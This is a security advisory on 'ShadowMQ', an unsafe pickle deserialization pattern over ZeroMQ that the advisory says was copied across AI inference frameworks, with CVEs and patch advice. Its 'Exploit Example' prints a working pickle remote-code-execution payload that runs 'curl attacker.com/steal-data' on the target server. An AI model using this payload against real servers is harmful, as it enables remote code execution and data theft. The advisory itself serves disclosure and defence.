What is ShadowMQ and what AI frameworks does it affect?

ShadowMQ is a collective term for widespread remote code execution vulnerabilities affecting major AI inference engines from Meta, Nvidia, Microsoft, and open-source PyTorch projects including vLLM and SGLang. The vulnerabilities trace back to unsafe use of ZeroMQ messaging library and Python's pickle deserialization module, exposing AI infrastructures processing sensitive prompts, model weights, and customer data.

What is the root cause of the ShadowMQ vulnerabilities?

The origin stems from a vulnerability in Meta's Llama large language model framework (CVE-2024-50050). The flaw involves insecure use of ZeroMQ's recv_pyobj() method to deserialize incoming data using Python's pickle module, which can execute arbitrary code during deserialization. The vulnerability was compounded by exposing ZeroMQ sockets over the network without authentication, allowing attackers to achieve remote code execution by transmitting malicious serialized objects.

Which specific CVEs are associated with ShadowMQ vulnerabilities?

The ShadowMQ vulnerabilities include CVE-2024-50050 in Meta's Llama framework, CVE-2025-30165 in vLLM framework, CVE-2025-23254 in NVIDIA TensorRT-LLM, and CVE-2025-60455 in Modular Max Server. Microsoft Sarathi-Serve research framework and SGLang framework also contain the vulnerability, with some frameworks remaining unpatched or having incomplete fixes.

How did the ShadowMQ vulnerability spread across multiple AI frameworks?

The security flaw propagated through code reuse and copy-paste practices across AI frameworks. For example, vulnerable files in SGLang explicitly stated they were adapted from vLLM, while Modular Max Server borrowed identical logic from both vLLM and SGLang, effectively perpetuating the same critical flaw across multiple codebases maintained by different organizations.

What should organizations do to protect against ShadowMQ vulnerabilities?

Organizations are strongly advised to immediately update affected frameworks to patched versions, restrict exposure of ZeroMQ sockets, and review any use of pickle() in their code or libraries. Meta patched the original vulnerability by replacing unsafe pickle serialization with secure JSON-based implementation using Pydantic, and similar secure alternatives should be implemented across affected systems.

Advisory

"ShadowMQ" exploit pattern reported in major AI frameworks, enables remote code execution

published: Nov. 14, 2025

Take action: The development of AI tool is still very much rushed, with insufficient security testing and a lot of copy-paste from other framework. All this because it's a rush to production, not building a secure product. The end user will probably suffer most. In general, be very conservative with AI frameworks, test a lot and patch very fast. For this particular instance, if you're using AI inference frameworks like Meta Llama, vLLM, NVIDIA TensorRT-LLM, SGLang, or Modular Max Server, immediately update to the latest patched versions and make sure ZeroMQ sockets are not exposed to untrusted networks.

Learn More

Cybersecurity researchers from Oligo Security are reporting a widespread pattern of remote code execution vulnerabilities affecting major artificial intelligence inference engines from Meta, Nvidia, Microsoft, and open-source PyTorch projects including vLLM and SGLang.

The vulnerabilities, collectively termed "ShadowMQ," trace back to a common root cause involving the unsafe use of ZeroMQ messaging library and Python's pickle deserialization module. This security flaw has propagated in multiple AI frameworks through code reuse and copy-paste practices, creating a cascade that is exposing AI infrastructures processing sensitive prompts, model weights, and customer data across in many exposed systems on the public internet.

The origin of the ShadowMQ pattern stems from a vulnerability in Meta's Llama large language model framework, tracked as CVE-2024-50050 (CVSS score 6.3 by Meta, Snyk scored it as 9.3).

The flaw is an insecure use of ZeroMQ's recv_pyobj() method to deserialize incoming data using Python's pickle module, which is inherently dangerous when processing untrusted data as it can execute arbitrary code during deserialization. The vulnerability was compounded by the framework exposing ZeroMQ sockets over the network without authentication, creating a scenario where attackers could achieve remote code execution by transmitting malicious serialized objects to vulnerable servers.

Meta patched this vulnerability in October 2024 by replacing the unsafe pickle serialization with a secure JSON-based implementation using Pydantic, and the pyzmq Python library also issued fixes with explicit warnings about using recv_pyobj with untrusted data.

Oligo Security researchers identified that the same insecure deserialization pattern had been replicated in many AI inference frameworks:

CVE-2025-30165 (CVSS score 8.0) - vLLM framework (addressed by switching to V1 engine by default, though not completely fixed)
CVE-2025-23254 (CVSS score 8.8) - NVIDIA TensorRT-LLM (fixed in version 0.18.2 with HMAC validation implementation)
CVE-2025-60455 (CVSS score N/A) - Modular Max Server (patched using msgpack instead of pickle)
Microsoft Sarathi-Serve research framework (remains unpatched)
SGLang framework (implemented incomplete fixes despite maintainer acknowledgment)

Exploit Example

Vulnerable Server Code:

import zmq
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")  # Exposed to network

# Vulnerable: Uses recv_pyobj with pickle deserialization
data = socket.recv_pyobj()  # Attack happens here
process_request(data)

Attacker's Malicious Payload:

class Exploit:
    def __reduce__(self):
        import os
        # Arbitrary command execution
        return (os.system, ('curl attacker.com/steal-data',))

# Send malicious object to vulnerable server
import zmq
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://vulnerable-ai-server:5555")
socket.send_pyobj(Exploit())  # Sends malicious object

What Happens:

Server receives the malicious object
recv_pyobj() calls pickle.loads() to deserialize it
Pickle automatically executes os.system() during deserialization
Attacker's command runs with server privileges

The vulnerable files in SGLang explicitly stated they were "adapted by vLLM," while Modular Max Server borrowed identical logic from both vLLM and SGLang, effectively perpetuating the same critical flaw across multiple codebases maintained by different organizations.

SGLang's adoption by major technology companies including xAI, AMD, Nvidia, Intel, LinkedIn, Cursor, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, and prominent universities amplifies the potential impact of the unpatched vulnerabilities.

Security researcher Avi Lumelsky emphasized that while AI projects are advancing at unprecedented speed and commonly borrow architectural components from peer frameworks, when code reuse inadvertently includes unsafe patterns, the security consequences propagate rapidly across the ecosystem.

Organizations are strongly advised to immediately update affected frameworks to patched versions, restrict exposure of ZeroMQ sockets and review any use of pickle() in their code or libraries.

"ShadowMQ" exploit pattern reported in major AI frameworks, enables remote code execution

Read More
Jenkins reports SSH Host Key Reuse in its …
Okta reports authentication bypass flaw for some long …
Mozilla warns of active phishing campaign targeting Firefox …
MacOS malware called RustDoor impersonates Visual Studio update
Critical Lua scripting flaw enables remote code execution …